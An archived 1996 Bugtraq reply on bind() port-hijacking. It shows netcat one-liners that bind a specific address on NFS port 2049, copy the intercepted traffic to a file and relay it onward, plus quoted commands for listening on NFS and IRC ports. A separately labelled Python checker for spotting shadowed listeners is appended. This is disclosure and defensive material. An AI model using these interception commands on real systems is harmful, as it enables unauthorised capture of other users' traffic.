[2501] in bugtraq


Re: BoS: bind() Security Problems

daemon@ATHENA.MIT.EDU (invalid opcode)
Fri Feb 2 20:34:32 1996

Date:         Thu, 1 Feb 1996 21:39:18 -0800
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: invalid opcode <coredump@nervosa.com>
X-To:         Bugtraq List <BUGTRAQ@CRIMELAB.COM>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
In-Reply-To:  <199601312126.OAA16107@crimelab.com>

Yes, but if you do this:
netcat -lvv -s 192.88.209.5 -p 2049 -e exploit.sh&

exploit.sh:
tee crap | netcat 192.88.209.5 2049

and then you can capture it all to the file: crap, and redirect it to the
original port.

Chris,
coredump@nervosa.com

On Thu, 1 Feb 1996, Darren Reed wrote:

> In some mail from Bernd Lehle, sie said:
> [...]
> > > Exploit:
> > [..]
> > > Run netcat:
> > >
> > > w00p% nc -v -v -u -s 192.88.209.5 -p 2049
> > > listening on [192.88.209.5] 2049 ...
> >
> > To take a look at irc packets: nc -v -v -l -s Your.IP.Adress -p 6667
>
> This won't get you messages between already connected clients and servers.
>
> Yes, you might be able to make clients connect, at first, to you and not
> a real server, but it is going to be obvious to the client: the connection
> won't complete as netcat won't generate the server replies which many
> clients now look for to indicate the confirmation of a connection.
>
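
A defender's check for the situation in this thread, as an added example that is not part of the original messages: it flags any port where a listener bound to one specific address sits alongside a wildcard listener, and whether the two belong to different UIDs. Assumptions: Linux /proc/net/tcp layout on a little-endian host, the original service bound to the wildcard address (not stated in the thread), constructed sample rows, and hypothetical function names.

```python
import socket
import struct
from collections import defaultdict

TCP_LISTEN = "0A"  # state code for LISTEN in /proc/net/tcp

# Constructed sample in /proc/net/tcp layout (not captured from a real host).
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0801 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1101
   1: 05D158C0:0801 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 1102
   2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1103
   3: 05D158C0:0016 0A00000A:C350 01 00000000:00000000 00:00000000 00000000     0        0 1104
"""

def parse_listeners(table):
    """Return (ip, port, uid) for every socket in LISTEN state."""
    listeners = []
    for line in table.splitlines()[1:]:           # skip the header row
        f = line.split()
        if len(f) < 10 or f[3] != TCP_LISTEN:     # ignore non-listening sockets
            continue
        addr_hex, port_hex = f[1].split(":")
        # Address is a host-order dump of the network-order value (little-endian assumed).
        ip = socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16)))
        listeners.append((ip, int(port_hex, 16), int(f[7])))
    return listeners

def find_shadowed(listeners):
    """Return (port, specific_ip, specific_uid, wildcard_uid, cross_user) tuples."""
    by_port = defaultdict(list)
    for ip, port, uid in listeners:
        by_port[port].append((ip, uid))
    findings = []
    for port, socks in sorted(by_port.items()):
        wild = [uid for ip, uid in socks if ip == "0.0.0.0"]
        for ip, uid in socks:
            if ip != "0.0.0.0" and wild:
                # A more specific bind receives traffic addressed to that IP.
                findings.append((port, ip, uid, wild[0], uid != wild[0]))
    return findings

if __name__ == "__main__":
    for port, ip, uid, wuid, cross in find_shadowed(parse_listeners(SAMPLE)):
        note = "DIFFERENT UID" if cross else "same uid"
        print(f"port {port}: {ip} (uid {uid}) shadows wildcard (uid {wuid}) [{note}]")
```

On a live host, pass the contents of /proc/net/tcp instead of SAMPLE; a cross-user finding on a service port is the case worth investigating first.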
